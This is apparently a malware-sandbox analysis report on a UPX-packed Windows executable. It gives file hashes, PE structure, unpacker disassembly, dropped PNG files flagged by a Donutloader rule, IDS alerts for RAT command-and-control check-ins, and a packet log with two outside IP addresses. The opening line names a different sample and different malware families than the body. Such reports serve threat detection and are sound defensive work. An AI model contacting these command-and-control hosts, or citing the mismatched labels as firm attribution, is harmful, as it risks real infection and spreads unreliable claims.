37f463bf4616ecd445d4a1937da06e19 | Co0Wd0QVRU.exe | malicious | Remcos, GuLoader | 159.75.57.35
                        No context
Process: C:\Users\user\Desktop\2IVWAPeiZm.exe
File Type: PNG image data, 1468 x 1027, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 1107015
Entropy (8bit): 7.986890293651004
Encrypted: false
SSDEEP: 24576:v1Ua6MOTSFoan3mshuAg2hPgAeLwaz5jLgrpqsey4vHlvX/M+XIcckqx:ua6MOTg3mt2hIA4wk5jUlq1y4PpE+XIT
MD5: C5497A158A878995BB05025560DDAEC2
SHA1: 03428561F384B78B5109E2D318EE7AF0C5E8DA68
SHA-256: A2657071C7C03990291739C0581E4A2863EBE49270C3CA6E3D2D7438EDEBA920
SHA-512: 584439B18CF9519F3DA5E820482CB412BEEF376B5A6C8D02757B24D04EAE060E6CE11E23E3D7C2CF780C21EBA3C3D85A40D2FD4E707DD4E3F80EF0E246F1A129
Malicious: false
Yara Hits:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Pictures\any.png, Author: unknown
Reputation: low
                        Preview:.PNG........IHDR.............#.z.....pHYs...%...%.IR$.....tEXtSoftware.Snipaste]..... .IDATx...n$..$.Tk..i......i...R.g.*I....MF3'3..}......I:...k...?...~?.....8..<___..l.=??..q....{.v..q....{.="".........{?.#..Oq.p_ooo..!...z.%..........Y-.p.'h....y........y............'........S........LN.o....?........o..#..[k.'....f.<#"...)..yJ.~..8.Z.*K.v.%. .?1.....v....s....|{{..OOO..-.....s.h.y.Ihb........d...$....L...Z..n.....-m-....Z..../FI.-....d.$.B..d[.{...."...'&.SLn.{.c.....o...n.6.Qi.........v...........r..nh.$'[.!..qc.....n...m......T.....3..}.2....!!........H...x{{{....n?~.H.~...T...."...^.L.........8..e/iS..JO..DO.c.Az...c..bA..f..65..6.@9.../>...+]}.~r......%....t...P.:9..U?c6..I..<..(OOO.........O....O.A.&.3....@.O...{..T....6....o..Y....A4A...&|....].1..G...I..........;"..~.h...9....e.08w................$"..x.Os8.H!J+j...>..3.........0I.....F-...py}}M..C.....N.N..Tm.=.k...qg...#.....D.]....DA6.8..u.p.....tT..!..;M.@~...<.L...!.D.F)...$&.E..
Process: C:\Users\user\Desktop\2IVWAPeiZm.exe
File Type: PNG image data, 1468 x 1027, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 1107015
Entropy (8bit): 7.986890293651004
Encrypted: false
SSDEEP: 24576:v1Ua6MOTSFoan3mshuAg2hPgAeLwaz5jLgrpqsey4vHlvX/M+XIcckqx:ua6MOTg3mt2hIA4wk5jUlq1y4PpE+XIT
MD5: C5497A158A878995BB05025560DDAEC2
SHA1: 03428561F384B78B5109E2D318EE7AF0C5E8DA68
SHA-256: A2657071C7C03990291739C0581E4A2863EBE49270C3CA6E3D2D7438EDEBA920
SHA-512: 584439B18CF9519F3DA5E820482CB412BEEF376B5A6C8D02757B24D04EAE060E6CE11E23E3D7C2CF780C21EBA3C3D85A40D2FD4E707DD4E3F80EF0E246F1A129
Malicious: false
Yara Hits:
• Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\any[1].png, Author: unknown
Reputation: low
                        Preview:.PNG........IHDR.............#.z.....pHYs...%...%.IR$.....tEXtSoftware.Snipaste]..... .IDATx...n$..$.Tk..i......i...R.g.*I....MF3'3..}......I:...k...?...~?.....8..<___..l.=??..q....{.v..q....{.="".........{?.#..Oq.p_ooo..!...z.%..........Y-.p.'h....y........y............'........S........LN.o....?........o..#..[k.'....f.<#"...)..yJ.~..8.Z.*K.v.%. .?1.....v....s....|{{..OOO..-.....s.h.y.Ihb........d...$....L...Z..n.....-m-....Z..../FI.-....d.$.B..d[.{...."...'&.SLn.{.c.....o...n.6.Qi.........v...........r..nh.$'[.!..qc.....n...m......T.....3..}.2....!!........H...x{{{....n?~.H.~...T...."...^.L.........8..e/iS..JO..DO.c.Az...c..bA..f..65..6.@9.../>...+]}.~r......%....t...P.:9..U?c6..I..<..(OOO.........O....O.A.&.3....@.O...{..T....6....o..Y....A4A...&|....].1..G...I..........;"..~.h...9....e.08w................$"..x.Os8.H!J+j...>..3.........0I.....F-...py}}M..C.....N.N..Tm.=.k...qg...#.....D.]....DA6.8..u.p.....tT..!..;M.@~...<.L...!.D.F)...$&.E..
File type: PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit): 7.937300315648467
TrID:
• Win64 Executable GUI (202006/5) 81.26%
• UPX compressed Win32 Executable (30571/9) 12.30%
• Win64 Executable (generic) (12005/4) 4.83%
• Generic Win/DOS Executable (2004/3) 0.81%
• DOS Executable Generic (2002/1) 0.81%
File name: 2IVWAPeiZm.exe
File size: 11'845'632 bytes
MD5: 06592a8ca068935d98a5ada152e3393d
SHA1: 41adfa7ad17a0842b62b227b37ea4778fe7d247d
SHA256: acce6a3f4a8de7b556e74279744466adf4ec318a9fc03c639cdbc7f47c60da0d
SHA512: 3d365860047c0b50a5d4d47e4bc081dfdd138045f847af764daaa24bc5f00edcce1051a028aba82ff9feb757511c30e27b1202e39bf503913aae0404eb77e30c
SSDEEP: 196608:nQvu0707Woow7L3XW0GDB8Zm6Y5Ao6YrRR7EDzrFa8vXGb1HOZp/tWIIe/kUCzUb:nN0707b4B2m6Y5Ao6GR7+hZ2b1HkmKbz
TLSH: BFC6336489B24096F05CFC35C1399DF69531AFB972DCE01E0E98BAE034FADE5A04C91B
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;T...5.U.5.U.5.UvMcUs5.U...T{5.U...Tu5.U...Te5.U...Ty5.U4M.Tz5.U.5.U.5.Ul..T~5.Ul..U~5.U.5gU~5.Ul..T~5.URich.5.U........PE..d..
Icon Hash: 11e4d4d2d2c4e451
Entrypoint: 0x141bcf3f0
Entrypoint Section: UPX1
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x66791980 [Mon Jun 24 07:00:16 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 53880e0e758436150751a6d80bd6a537
                        Instruction
                        push ebx
                        push esi
                        push edi
                        push ebp
                        dec eax
                        lea esi, dword ptr [FF4CEC05h]
                        dec eax
                        lea edi, dword ptr [esi-0109D000h]
                        push edi
                        xor ebx, ebx
                        xor ecx, ecx
                        dec eax
                        or ebp, FFFFFFFFh
                        call 00007F64F0B1AA25h
                        add ebx, ebx
                        je 00007F64F0B1A9D4h
                        rep ret
                        mov ebx, dword ptr [esi]
                        dec eax
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        mov dl, byte ptr [esi]
                        rep ret
                        dec eax
                        lea eax, dword ptr [edi+ebp]
                        cmp ecx, 05h
                        mov dl, byte ptr [eax]
                        jbe 00007F64F0B1A9F3h
                        dec eax
                        cmp ebp, FFFFFFFCh
                        jnbe 00007F64F0B1A9EDh
                        sub ecx, 04h
                        mov edx, dword ptr [eax]
                        dec eax
                        add eax, 04h
                        sub ecx, 04h
                        mov dword ptr [edi], edx
                        dec eax
                        lea edi, dword ptr [edi+04h]
                        jnc 00007F64F0B1A9C1h
                        add ecx, 04h
                        mov dl, byte ptr [eax]
                        je 00007F64F0B1A9E2h
                        dec eax
                        inc eax
                        mov byte ptr [edi], dl
                        sub ecx, 01h
                        mov dl, byte ptr [eax]
                        dec eax
                        lea edi, dword ptr [edi+01h]
                        jne 00007F64F0B1A9C2h
                        rep ret
                        cld
                        inc ecx
                        pop ebx
                        jmp 00007F64F0B1A9DAh
                        dec eax
                        inc esi
                        mov byte ptr [edi], dl
                        dec eax
                        inc edi
                        mov dl, byte ptr [esi]
                        add ebx, ebx
                        jne 00007F64F0B1A9DCh
                        mov ebx, dword ptr [esi]
                        dec eax
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        mov dl, byte ptr [esi]
                        jc 00007F64F0B1A9B8h
                        lea eax, dword ptr [ecx+01h]
                        jmp 00007F64F0B1A9D9h
                        dec eax
                        inc ecx
                        call ebx
                        adc eax, eax
                        inc ecx
                        call ebx
                        adc eax, eax
                        add ebx, ebx
                        jne 00007F64F0B1A9DCh
                        mov ebx, dword ptr [esi]
                        dec eax
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        mov dl, byte ptr [esi]
                        jnc 00007F64F0B1A9B6h
                        sub eax, 03h
                        jc 00007F64F0B1A9EBh
                        shl eax, 08h
                        movzx edx, dl
                        or eax, edx
                        dec eax
                        inc esi
                        xor eax, FFFFFFFFh
                        je 00007F64F0B1AA2Ah
                        sar eax, 1
                        Programming Language:
                        • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1be9efc | 0x394 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1bd0000 | 0x19efc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xa000 | 0x54c | UPX0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1bea290 | 0x1c | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1bcf660 | 0x140 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0x109d000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0x109e000 | 0xb32000 | 0xb31800 | ad0fc76477b2538272647cd74e93ea9e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1bd0000 | 0x1b000 | 0x1a400 | 5ed7e331e59de464c4f1ccb0081d5ce9 | False | 0.07168898809523809 | data | 5.111993796583546 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
ADOBE | 0x71ed50 | 0x1492ff0 | empty | Chinese | China | 0
MSC | 0x306750 | 0x418600 | empty | Chinese | China | 0
UNINS000 | 0xb2f0 | 0x2fb45f | empty | Chinese | China | 0
RT_ICON | 0x1bd02f4 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | Chinese | China | 0.038950668401750856
RT_ICON | 0x1be0b20 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | Chinese | China | 0.0805452865064695
RT_ICON | 0x1be5fac | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Chinese | China | 0.11203319502074689
RT_ICON | 0x1be8558 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Chinese | China | 0.1625234521575985
RT_ICON | 0x1be9604 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Chinese | China | 0.34397163120567376
RT_GROUP_ICON | 0x1be9a70 | 0x4c | data | Chinese | China | 0.8157894736842105
RT_VERSION | 0x1be9ac0 | 0x2b8 | COM executable for DOS | Chinese | China | 0.4813218390804598
RT_MANIFEST | 0x1be9d7c | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
api-ms-win-crt-filesystem-l1-1-0.dll | _lock_file
api-ms-win-crt-heap-l1-1-0.dll | free
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
api-ms-win-crt-runtime-l1-1-0.dll | exit
api-ms-win-crt-stdio-l1-1-0.dll | fgetc
KERNEL32.DLL | LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
MSVCP140.dll | ??1_Lockit@std@@QEAA@XZ
VCRUNTIME140.dll | memset
VCRUNTIME140_1.dll | __CxxFrameHandler4
WININET.dll | InternetOpenW
Language of compilation system | Country where language is spoken | Map
Chinese | China |
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/05/24-07:33:08.224440 | TCP | 2052875 | ET TROJAN Anonymous RAT CnC Checkin | 49731 | 6666 | 192.168.2.4 | 206.238.115.146
07/05/24-07:35:32.860010 | TCP | 2052875 | ET TROJAN Anonymous RAT CnC Checkin | 49741 | 6666 | 192.168.2.4 | 206.238.115.146
07/05/24-07:36:35.724322 | TCP | 2052875 | ET TROJAN Anonymous RAT CnC Checkin | 49744 | 8888 | 192.168.2.4 | 206.238.115.146
07/05/24-07:34:21.149333 | TCP | 2052875 | ET TROJAN Anonymous RAT CnC Checkin | 49732 | 6666 | 192.168.2.4 | 206.238.115.146
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 5, 2024 07:33:02.806615114 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:02.806674004 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:02.806744099 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:02.816004992 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:02.816026926 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:04.121081114 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:04.121207952 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:04.122019053 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:04.122216940 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:04.540115118 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:04.540153027 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:04.540457010 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:04.540535927 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:04.542411089 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:04.588500023 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:04.949336052 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:04.949352980 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:04.949393988 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:04.949562073 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:04.949577093 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:04.949630022 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.031039953 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.031148911 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.031161070 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.031222105 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.032598972 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.032663107 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.032697916 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.032705069 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.032742977 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.036003113 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.036082983 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.036091089 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.036135912 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.037962914 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.038034916 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.038043022 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.038081884 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.040693045 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.040764093 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.040771008 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.040817976 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.120743036 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.120847940 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.120865107 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.120908022 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.121611118 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.121674061 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.121682882 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.121725082 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.122400999 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.122459888 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.122467995 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.122505903 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.124325991 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.124391079 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.124397993 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.124443054 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.124619007 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.124681950 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.124689102 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.124726057 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.128606081 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.128622055 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.128706932 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.128715992 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.128762007 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.132456064 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.132468939 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.132564068 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.132571936 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.132618904 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.211297035 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.211318016 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.211360931 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.211373091 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.211409092 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.211420059 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.212424994 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.212452888 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.212491989 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.212502003 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.212527037 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.212557077 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.212794065 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.212855101 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.212862015 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.212903976 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.214402914 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.214418888 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.214466095 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.214474916 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.214490891 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.214514971 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.216075897 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.216130972 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.216137886 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.216181040 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.216347933 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.216396093 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.216403961 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.216444969 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.216681004 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.216737032 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.216744900 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.216784954 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.220623016 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.220685005 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.220693111 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.220735073 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.225718975 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.225770950 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.225780010 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.225820065 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.230592966 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.230652094 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.230660915 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.230715990 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.235692024 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.235743999 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.235753059 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.235795021 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.238662004 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.238723040 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.238730907 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.238773108 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.243673086 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.243753910 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.243762016 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.243805885 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.300818920 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.300926924 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.300940037 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.300983906 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.301094055 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.301147938 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.301156044 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.301198959 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.301645041 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.301703930 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.301711082 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.301754951 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.302038908 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.302098036 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.302104950 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.302145958 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.303823948 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.303838015 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
Jul 5, 2024 07:33:05.303885937 CEST | 49730 | 443 | 192.168.2.4 | 159.75.57.35
Jul 5, 2024 07:33:05.303894043 CEST | 443 | 49730 | 159.75.57.35 | 192.168.2.4
